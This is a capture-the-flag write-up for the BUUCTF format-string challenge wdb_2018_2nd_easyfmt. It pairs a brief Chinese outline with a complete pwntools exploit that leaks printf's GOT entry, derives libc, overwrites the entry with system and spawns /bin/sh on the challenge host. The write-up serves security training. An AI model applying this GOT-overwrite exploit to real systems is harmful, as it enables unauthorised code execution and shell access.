[BUUCTF-pwn]——wdb_2018_2nd_easyfmt
一个简单的格式化字符串利用问题
- 泄露出got表地址,找到libc基地址
- 寻找system的实际地址
- 将printf_got修改为system的地址
- 写入 "/bin/sh"
exploit
# Exploit script for the BUUCTF challenge wdb_2018_2nd_easyfmt (a format-string
# bug). Flow: leak printf's GOT entry, resolve libc from the leak, overwrite
# that GOT entry with system's address, then send "/bin/sh".
# NOTE(review): p32() returns bytes and this file concatenates it with str
# literals, so it runs as written only under Python 2 (Python-2 pwntools).
from pwn import *
from LibcSearcher import *
# Verbose I/O logging: every send/recv is printed, which is what you want when
# the leak parsing below goes wrong.
context.log_level = "debug"
# Remote target is hard-coded; swap in the commented-out process() line to run
# against a local copy of the binary.
p = remote('node3.buuoj.cn',25125)
#p = process("./wdb_2018_2nd_easyfmt")
elf = ELF("./wdb_2018_2nd_easyfmt")
# Address of printf's GOT slot: both the leak target and the write target.
printf_got = elf.got["printf"]
# Stage 1 (leak): the 4-byte GOT address goes at the start of the input and
# "%6$s" makes printf dereference the 6th stack argument, i.e. that address,
# so the current value of the GOT slot (printf's libc address) is printed.
payload1 = p32(printf_got) + "%6$s"
p.sendlineafter("repeater?\n",payload1)
# Discard the first 4 bytes of the reply (presumably the echoed address bytes
# that precede the dereferenced value — confirm against the binary's output).
p.recv(4)
printf_addr = u32(p.recv(4))
# Python-2 print statement with parentheses: emits a tuple ('printf_addr ---> ', '0x...').
print("printf_addr ---> ",hex(printf_addr))
# Stage 2: identify libc from the leaked printf address and derive the base.
# LibcSearcher is an external helper; its dump() values are symbol offsets
# within the matched libc.
libc = LibcSearcher("printf", printf_addr)
libcbase = printf_addr - libc.dump("printf")
system = libcbase + libc.dump("system")
# Stage 3: format-string write of `system` into printf's GOT slot, using the
# same stack offset (6) established by the leak above.
payload = fmtstr_payload(6,{printf_got: system})
p.sendline(payload)
# Presumably the program printf()s its input again; after the overwrite that
# call resolves to system(), so the input string becomes the command.
p.sendline("/bin/sh\x00")
p.interactive()